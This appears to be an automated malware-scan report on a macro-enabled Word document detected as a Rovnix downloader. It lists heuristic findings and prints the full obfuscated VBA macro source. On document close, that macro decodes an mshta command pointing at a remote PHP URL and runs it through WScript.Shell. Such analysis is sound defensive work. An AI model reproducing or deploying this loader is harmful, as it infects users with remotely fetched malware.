MALICIOUS
292
Risk Score
Heuristics 8
-
ClamAV: Doc.Downloader.Rovnix-6497736-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Rovnix-6497736-0
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Application.Run "GNjKRAFwHEjLiU" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
CreateObject(xfUqIIdDLUKgHEwy).Run cGFYngIEIWRdArbDpT, 0 -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 9317 bytes |
SHA-256: 708c553e4202d5a83f462c7ec10f93bd01c88b214b9ab662eb739a5f2e3f5b21 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
250 of 301 identifiers look randomly generated (e.g. 'xYzzoMyHicNNfoijowufjvXFnoYiynRkHowudvXF') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub VQBdgVxJKqkfEC()
BxOoBxwVyKFg = "dZ" + "byLKwgMYnRKqqScIPcPJCP" + "UOFOLziqcvNSuYBKr"
ydTknTgvZjPY = 798 - 1801
RooFRuCbx = "FnVIkpHNJVDIcyBpZzQgGoyjy" + "DBkjFTFFHVEbprCbGqoEnEiZn" + "kvonpPIwWzFx"
zvYBAMSW = 1609 + 384 + 1975 + 686
zADcwOM = "MFCOJULNxUxGiwCUHK" + "K" + LTrim("JjgFnuMJDyiPHcguUuSfw") + "CIYppwuQffqYZz"
Application.Run "GNjKRAFwHEjLiU"
yyuPKUxX = 399 + 188 + 1214 + 1657 + 385 + 451
zBEECqk = 6 + 380 + 1026 + 1780 + 1416 + 1145
nRKdKybpZi = 1470 + 348 + 1205 + 1409 + 515 + 1763 + 1586
dIFJzXGVOSr = "KYEPzOUgWfQRKcB" + "IwjNBuv"
MEXHIrM = LTrim("EKFyR") + "CAPPFErdAxkNiFkfinDbwTUSuKDyWn"
End Sub
Sub GrzDwuZfpdTfAw()
IzPyJJBrz = 913 + 1949 + 417
CbYYZbDJ = "HBZCpkvEiCj" + LTrim("PJ") + LTrim("kfRSFUOOwizDd") + "JXvyFnDMQurpRvVRGVdPFiYZMFxQ"
oGcDopqjHkxK = RTrim("TPGSgjg") + "IX" + "UbQCkwFbvALWrU" + LTrim("ENZLjQnNcHdDVCggYuqgYyb") + "vpfqKcjpbJZTRgUXdd"
HLWYWLkzYfdO = 721 + 1375 + 251 + 1903 + 574
Application.Run "VPXEyEUduVNbZxHIu"
FqwLVGw = "VuRrBi" + "NVWcwOWNMARZbRHzZnMgTBiJ" + LTrim("Jzqi") + RTrim("fCQJkoQSXyzWkvjcbUWOoypj") + RTrim("fjRUKHEWCyJcPwiRoSBwcLHoZ")
UxqkfiQQpT = RTrim("WxJBLMfiMKbXSjfIBLvxw") + RTrim("nqCXJJPSYHbxkMWXNfNyGuicoBxO") + LTrim("oDMnZdNgAWBBDNHHKEyvUVEbJZ")
CvVIdUQxWV = 1290 + 1830 + 209
RbOXOQTG = 481 + 1690 + 1507 + 705
End Sub
Sub VPXEyEUduVNbZxHIu()
NKIAnYqANjwB = 442 - 287 - 959
OOcQBxBTDpO = 1999 + 1623 + 820 + 708 + 590
qbofCTQxiCA = 1901 - 1242 - 306 - 1645 - 1504 - 1310 - 1182
VYjCpTx = "zjrWkbQfUrRoEDfLGRQvZPLDqCXc" + LTrim("MdcduHPPJ") + "JLQMQV" + RTrim("gUYKwMyVBZTvKHvF") + RTrim("JFJoxiVwcxcKyIEoJOvJ")
XUkGOYjQkiNx = 690 + 982 + 1618 + 1744
XzpzjdNzQV = 1491 + 1128 + 158
cGFYngIEIWRdArbDpT = "AgiZQyJATRyIpYIDNrJzjrEBhqJcqyMKpXZWXvXFnoYiynRkH hqJcqyMKpXZWXqJcqyMKpXZWXp://xYzzoMyHicNNfoijowufjvXFnoYiynRkHowudvXFnoYiynRkHwd.coAgiZQyJATRyI/OU/pYIDNrJzjrEBqJcqyMKpXZWXxYzzoMyHicNNAgiZQyJATRyI.php?uqJcqyMKpXZWXAgiZQyJATRyIvXFnoYiynRkH=brvXFnoYiynRkHnddFSoNDpBBVRf"
cGFYngIEIWRdArbDpT = Replace(cGFYngIEIWRdArbDpT, "AgiZQyJATRyI", "m")
cGFYngIEIWRdArbDpT = Replace(cGFYngIEIWRdArbDpT, "vXFnoYiynRkH", "a")
SyMPncHj = 622 - 868 - 1883 - 1095
cGFYngIEIWRdArbDpT = Replace(cGFYngIEIWRdArbDpT, "pYIDNrJzjrEB", "s")
QOgiPHJ = RTrim("xiQZpbvKULD") + "kvAPLQbjTiO"
jyLFZuwqku = "dMVBPKGzMTNYqwHXBPTLNk" + "ncx" + LTrim("vVbPKrLcWJFIIdV")
bdRqKSjfpO = 1249 - 936 - 1997 - 830
DATEdKC = 333 + 41 + 1056 + 871 + 166
cGFYngIEIWRdArbDpT = Replace(cGFYngIEIWRdArbDpT, "qJcqyMKpXZWX", "t")
cGFYngIEIWRdArbDpT = Replace(cGFYngIEIWRdArbDpT, "xYzzoMyHicNN", "e")
cGFYngIEIWRdArbDpT = Replace(cGFYngIEIWRdArbDpT, "dFSoNDpBBVRf", "l")
BEAOOdyO = 857 + 80 + 1634 + 1448 + 140
FrXqKjDcxw = 393 + 1811 + 571 + 1822 + 151
xfUqIIdDLUKgHEwy = "WScripRXDZvYcEvUHG.ShvdHSMTbMWqLwRRiLSNGGGfJwRRiLSNGGGfJw"
xfUqIIdDLUKgHEwy = Replace(xfUqIIdDLUKgHEwy, "PivkBnPXEQpK", "m")
xfUqIIdDLUKgHEwy = Replace(xfUqIIdDLUKgHEwy, "vBHYkuNSgTjk", "a")
rUFSNqoIXcpn = 1 - 765 - 426 - 1821 - 723 - 1342
xAjxfxWDLH = 1035 - 567 - 1126 - 953 - 1478 - 819
xfUqIIdDLUKgHEwy = Replace(xfUqIIdDLUKgHEwy, "MqoRFCqGuSMq", "s")
PCnXSpSiGUJ = 105 + 411 + 1482 + 340 + 448 + 1203
IYSEGQDYc = RTrim("HfRpBp") + "YZgTADwgzIoKfkNjjCvIUyYMYr"
bnYJWVnKk = 1459 - 133 - 1758
xfUqIIdDLUKgHEwy = Replace(xfUqIIdDLUKgHEwy, "RXDZvYcEvUHG", "t")
JDUHdoFEYDUP = RTrim("ZO") + LTrim("dWvQBGBbriTSIRxocxwIK") + "d" + "wSYngboyAijCWWgVKHWJqUXjRZb"
GvTQLfORPojR = 1859 + 1460 + 196 + 1685 + 1732
xfUqIIdDLUKgHEwy = Replace(xfUqIIdDLUKgHEwy, "vdHSMTbMWqLw", "e")
TEqTpIW = 1750 - 39 - 264 - 1324 - 1554
GdEgfFgxf = 1049 + 241 + 1815 + 981
kNwOWvb = RTrim("D") + "HHGkGYkVbfIFciNdoTTWKBUgWL"
xfUqIIdDLUKgHEwy = Replace(xfUqIIdDLUKgHEwy, "RRiLSNGGGfJw", "l")
UHrRbEwuQ = RTrim("ffkIkdUgWCCHjwGSoinbXPbTNOdH") + "XniRifXoSxZpvUoCrZgcXEHEcSnZOP" + "KcTCwNVAkxwVZXPIjXqODuyfw" + RTrim("EFHDRqOZxZWxISxCGA") + LTrim("ARVKZpMZLOfzpNCcTbUArWONNw")
yrqEUPYXHAVS = 933 - 1015 - 1501 - 42
GFxUUgS = "uBgNCioRpjuAMOkFBJnJH" + "LKFgTOdVMbgFrKEZozJN" + LTrim("cIUyGZnQTxGvXXVZBACpBd")
BBUoPJYpJc = "SFPyXZzzZgXHNpRbwpYuGBWEINIun" + LTrim("rJuyPyqXLPgVxqXDK") + "WSGZZyZRnWRjyy" + RTrim("BOJCZXUG")
CreateObject(xfUqIIdDLUKgHEwy).Run cGFYngIEIWRdArbDpT, 0
vBDRXybpySSW = LTrim("KrdNMiTNKMQZvYApgxVLQVQd") + "FSNKWy" + LTrim("jRHNwkS") + "RDCxOZUWwEINSVKyWCCZTidivjSVFA" + RTrim("BoLHMAEJd")
jxYbijYHQn = 282 + 1121 + 1178 + 601 + 977 + 828
kKQpXVGj = "CEIck" + "cbkUZHCbGKWuLSobSnHdZwPNIyXVLV" + RTrim("OGBorrJNMSidOIywHAykbKIJkicvRn")
DqqOrgKSBcCg = 1326 + 1172 + 1748 + 421 + 745
OzLNUby = "UdHJyWfPowRXgLqqpNyrwULiLXfxW" + "uOKZE" + "SU" + RTrim("VIfgyRWrQHNjdDocKMGQHNF") + LTrim("PNoLkyxQSqN")
ZZQMHMpWnc = "BGSNdIjXKBqQMnyjnxpwHjdoT" + LTrim("qUTyrTRgqKSFQZp") + "VduM"
CIdHdMbR = 1492 + 16 + 56
UDiQMrOYFfqT = 1586 - 812 - 1475 - 472 - 140
End Sub
Sub GNjKRAFwHEjLiU()
KIAQrCXzc = 516 - 779 - 1338 - 466
kRYoEnizoMZ = 176 - 1920 - 531 - 1594
FQoSKXDLZbV = 1016 + 1469
Application.Run "WpkQxiUjAVcrIM"
End Sub
Sub cupCkcZBNSnIKu()
gJcPXzcMEwu = 887 + 1108 + 457 + 1738
pAqVKrYx = 322 - 937 - 1711 - 699 - 1643 - 1473 - 1806
kXFVTZZQ = RTrim("FiGrWddLCKGzujXBXpFuFkn") + RTrim("KBTDJBG") + "ZJEZSMTpuxrdiboHFBJypccH" + "OVEiZRHpUUon"
AFdJrQHwBrbV = "fWgZzgdSG" + "jQfxopwDyEfKPVgRWfQAXqXCB"
vNAnCnTUipW = 1354 - 1820 - 1009
Application.Run "GrzDwuZfpdTfAw"
zwUYBJfLCB = "kE" + RTrim("uPBrVXRcSYQb") + "bZCXAKIcfDZJvbLWZi"
rYCTUNXS = 1508 - 1085 - 59 - 1266
oWzpcArpg = 366 - 527 - 1120 - 639
VkwXWLyZzg = 17 + 944 + 531 + 832 + 1589 + 1731 + 876 + 829
IjAuwwvDIX = 1835 + 872 + 1943 + 103 + 94 + 1846 + 1976
TbCNDAB = RTrim("oKPzdp") + "UwwWHqZgTSogHMNquYOyX"
kgNfcOFA = LTrim("QpqBjOY") + "MXdYNyfxN" + "WwEocdywrUSHykubHP" + "bMvGOdVuuwcYFCwvRY" + "PvzrwKfKKFuBofrCWROfuUVivTDXz" + LTrim("zuOqMBWAqVqHnUHLg")
End Sub
Sub AutoClose()
VTPQcTyZVFNk = RTrim("xnSxnSPVHqnMuSHVE") + "Yv" + LTrim("QnWbOTyZDTXLF")
MHVofYW = 1100 + 748 + 1707 + 1876 + 592
pPbTiBSgKjb = 523 + 1536
Application.Run "RcjEwHjAWJGSoD"
oOoPvIqDBYPM = LTrim("pYvPdxFZDFbznndCnFEkgvP") + "JQFDBkOSfcqCTUiJIKZcNS" + RTrim("CTQPSqXYEPRB") + "nRCFJiI" + "NOdZd" + RTrim("kBbKIcUVE")
PMRgGIg = LTrim("A") + "cGXKYIWJKHNJggddPpkMJIOXiucI" + RTrim("CD")
zZDcdZcokbQ = LTrim("xPRxV") + RTrim("TGYQQFQRiUAnGXxb") + "TjdzTpuZGrJMgFVF"
IxFudgHbL = 1019 - 1086 - 1137
GFYQzScvSQy = 1636 - 843 - 1455 - 1120 - 925 - 893
ZSExocYJ = "bZCFNUiOY" + RTrim("vTUAHUbfRjCiiTjGfNuSQb") + LTrim("fqxfUTVSGnHT")
vHGGUcVMR = RTrim("EYoERAJMyUTMJ") + "xnEzWBKgkIYBAgEMGUXFV" + RTrim("QnAfvMzgd") + LTrim("DcOACIGFBSZMcA")
End Sub
Sub RcjEwHjAWJGSoD()
IMoguxPiNT = 1830 + 1034
rHHYdXVC = 1105 + 236 + 452 + 90
MpEUYFyHRLPH = 701 + 1198 + 1065 + 294 + 66 + 246 + 891 + 1741
DnSrSbznH = "xvDRdOS" + LTrim("UZLpEMTpVLD") + LTrim("XJTYG")
XpcwjbnYp = "OoxJSPn" + "QMCw" + "cPqxufIjNdbqzWq" + "NUzLpSAEjZfj"
Application.Run "VQBdgVxJKqkfEC"
GfvyBSLwfrP = 487 - 130 - 77
vgREHIyKFMPr = "IbBvWSKwQOMRM" + RTrim("PObYGLXPRwMCKYifJqG") + RTrim("pZozpbSZbHZYZRVkjpuYYZzozKW")
XHiwrujKi = RTrim("QyciJvMNKIcCoOiIgMGUNXBBVzxfYI") + "DnSLFQVCMQVHBucQPWbBgNfz" + RTrim("qQ") + LTrim("zfJqYMKWnvbTuSMKcFjxGvw") + LTrim("FEUxKTTIgVrDAxBBQBqDOWb")
LTSRnpPz = "B" + RTrim("vzYQgDd")
fvfDHvprTid = 1171 - 1432 - 786 - 381 - 803 - 1576 - 660 - 1954 - 795
End Sub
Sub WpkQxiUjAVcrIM()
GxkJPOR = "ZGxQWbpDrfcKypSAiAoHSnu" + RTrim("vYKATIQkIHwYRNrzoycJY") + "TkCodC" + "KzARHWvuIG"
YdcquOFJN = "VJCLZInkNcQKYVUUcLDfPvvWEuxKkI" + "LikUDEVkFFxMPQwRKwbwkSgKOuRHzy" + RTrim("FjroD") + "YREfLYDGRuUMjkfISyfT" + RTrim("RQWuZknkAuiOUDpjD")
kIQXzSidwWI = 1849 - 895 - 690 - 633
wKkRUBbfWgH = LTrim("XRi") + RTrim("TGHLvrZ") + "VMuBDzq" + RTrim("QncxFogZb") + "PLZo" + "p"
IgoIBHY = LTrim("rWFiqwLLYUdZwk") + "qZMFPDuQPibIUIkBnkJrrEOHqVx" + RTrim("ZNdWDVQdxvydFIIqCSLEnIqn")
Application.Run "RbRgYMGnLoRFMT"
ASZVJUyPgDrP = LTrim("QTYrqpigdTkQjv") + RTrim("vJLLwZFqjGGfzOqnywHpQN") + LTrim("BWpKBqnzXUBuzUpnRTqzIV") + "IwNRfxbJVDbOkXFgBAZkUokW"
PEMyyWrCSdp = "VAGfizudRqdFWGETXBYSSE" + RTrim("dOIZKRXffYbNcDvZPrQDZJWuV") + RTrim("ZEPokAf") + LTrim("ApQA") + LTrim("xyEQ")
PNbfNyYbV = LTrim("EMUADiDXISUjBDvDgyMY") + "cOjiKAXxuuR" + "CffCkOJDHpgfXzARZIgRWLfKBYTAR"
IyqSWqYLdJ = 783 + 1525 + 1328 + 91
OQGIMRz = LTrim("pMxnWiMXYooqTdgVGp") + RTrim("AnQFRbNwBGxTfojoVQdYJJGpDHI") + "NjdNRCLfxMuXwzKJqLXZbgWyiQQJFv"
rGrJgQv = "ovgzpEUGTIgDGNXdwAjGK" + "CDbwqGIQYIAGfNMEGDjbVcYTcVW" + "nEiHDED"
End Sub
Sub RbRgYMGnLoRFMT()
BGdWRTdzB = "nRqFCwNEOyUcRYuUbCiooXWQORPRB" + RTrim("iGHrborHnruAIywnOILMG") + "FxDQJGWGv"
zKSSiYyR = LTrim("G") + "nj" + "gnNRyvrbZrAzynz" + LTrim("MUNpQzcbCIKDGAoyAwOWWuVRxRNuJ") + RTrim("P")
Application.Run "cupCkcZBNSnIKu"
nJxAOKuUIy = "fMUcHPGJibuFJcTgJXzjdvMbzrX" + "TjkPKHbZfpKj" + "Tf"
LnMvdnw = 1062 - 201 - 634 - 638 - 921
yVPFzWqf = LTrim("XpvMgjQfPWbTRDG") + "HWTBJncrRMY" + RTrim("BzUXpFDjInqCFWTrETFxCGcgWkEwQp") + "UXjnLQVnOEECKUxGD"
cJLLYrPPSCFA = 1056 - 1760 - 64
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 29184 bytes |
SHA-256: 90bebea237984cfe8ebbcc4c23692241b601c3fd7f1cc045f68893fd62f05cdc |
|||
|
Detection
ClamAV:
Doc.Downloader.Rovnix-6497736-0
Obfuscation or payload:
likely
647 of 836 identifiers look randomly generated (e.g. 'xYzzoMyHicNNfoijowufjvXFnoYiynRkHowudvXF') — consistent with name-mangling obfuscation.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.